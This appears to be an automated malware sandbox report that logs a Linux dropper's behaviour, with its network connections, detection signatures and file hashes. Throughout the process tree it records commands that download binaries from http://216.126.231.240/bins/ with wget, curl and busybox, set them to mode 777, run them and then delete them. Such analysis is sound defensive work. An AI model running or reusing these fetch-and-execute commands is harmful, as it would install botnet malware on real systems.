/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
30s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
